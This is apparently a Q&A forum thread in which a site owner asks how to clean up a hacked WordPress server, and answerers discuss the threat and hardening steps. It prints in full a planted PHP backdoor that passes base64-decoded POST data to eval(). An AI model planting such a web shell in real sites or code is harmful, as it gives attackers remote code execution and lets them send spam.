Malicious PHP file found on my webserver, need help cleaning and preventing this from happening again [closed]

Asked 4/6, 2013 at 5:18 Answered 4/6, 2013 at 5:30

Solved php wordpress security spam malware

My hosting provider recently suspended my website because something on it was sending out enormous amounts of spam email. Originally me and the provider thought that this was due to an unsecured form for an email campaign I put up on the server a couple days prior. I removed the page with the form from the server, but the server was still sending spam emails.

I found a php file named 7c32.php in the "css" folder in the root directory of the server. I definitely did not make it. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

After running it through an online decoder, this is what it came up with:

if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));

I did some reading about malicious php files and saw that the eval( and base64_decode strings were highly suspect. I looked through the server log file and saw several post queries with this 7c32.php file originating from an ip address from Saudi Arabia.

I deleted the php file, updated all outdated wordpress themes and plugins (as well as the platform itsself, and changed the password to the FTP server and Wordpress administrative account to something much more secure.

Is there anything else I can do to ensure my server is secure? I'm about to go search for these base64 and eval( strings in every other php file on the server, but other than that, I'm out of ideas.

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

Any help would be greatly appreciated.

Youngman answered 4/6, 2013 at 5:18 Comment(2)

If you deleted the file and updated your WP themes, I would say, there isn't much to do, just protect your site, by denying upload/permission permission to your folders/ – Elisaelisabet 4/6, 2013 at 5:24

Duplicate of: How to get rid of eval-base64_decode like PHP virus files? – Gamboge 27/5, 2016 at 15:8

eval() is a very dangerous little language construct in that it can execute practically any piece of PHP code passed to it as a string, so it certainly could be that script sending the mail, although sending out spam is actually fairly non-destructive as far as what eval() could do.

If your page had the permissions to delete every file in your web root, eval() would also be able to do it too, just by someone sending the right command to the script via POST.

If you really want to ensure it is that piece of code sending out the mail, put it back but modify it to your advantage. Stop it from using eval() and instead save the POST data to a database or text file. It is the only way you will know exactly what this code is being used for.

Sarre answered 4/6, 2013 at 5:30 Comment(2)

Could you please tell me how to do this, I have absolutely no experience in PHP, I'm just learning the hard way. Figuring out whether or not this is the code that is sending the spam would be amazing. – Youngman 4/6, 2013 at 5:32

Try this line of code instead of what was in there:

<?php if(isset($_POST["code"])){$log = fopen("malLog", "a");fwrite($log, base64_encode($_POST["code"]) . "\n");fclose($log);}?>

. Every time the page is accessed it will try to open (or create) a file named "malLog" and write into it the string that the previous bad code was trying to eval(). Can't guarantee it will work, I'm on the clock and don't have time to test it properly right now. – Sarre 4/6, 2013 at 5:47

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

How do you believe this code is too short to demage? It is the worst possible code there with eval()

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

They can execute any PHP code using that too short code. Eval is EVIL. Do not allow file upload permissions without validation

but what else can be sending out all of that spam mail?

That same very eval code is sending emails. They post email code to it and it in turns executes it and sends out the email

Archy answered 4/6, 2013 at 5:29 Comment(8)

Ah, I see now. I have no experience with PHP at all, so I barely understood what I was looking at. How can I tell the server to disallow file upload permissions without validation? – Youngman 4/6, 2013 at 5:34

First of all set your directory permissions to read only, so that no upload is possible. Secondly check any of your file upload codes and / or post them here to discuss what flaws that could have. Whenever you receive any input from user you have to try to sanitize it and not save it on the server as it is. This loophole must be in your file upload form – Archy 4/6, 2013 at 5:35

Ok, I went into filezilla, selected all three directories in the root and applied the following permissions (unchecked everything but read) i.imgur.com/mklzSfQ.png Forgive my ignorance but what exactly are file upload codes? Thank you for all your help by the way. – Youngman 4/6, 2013 at 5:45

I mean do you have any HTML or PHP code in there where you allow users to upload any file? or did you install some script etc? – Archy 4/6, 2013 at 5:46

No, definitely not. The only uploads are done through FTP. Two questions: do I have to change the permissions again to upload new things to the server? Can I make it so only I can upload things through FTP? – Youngman 4/6, 2013 at 5:49

ok, then is your FTP login secure enough? – Archy 4/6, 2013 at 5:50

Yes. I changed it to a huge string of letters and numbers. – Youngman 4/6, 2013 at 5:51

let us continue this discussion in chat – Youngman 4/6, 2013 at 5:56

Recommended topics

Hot tags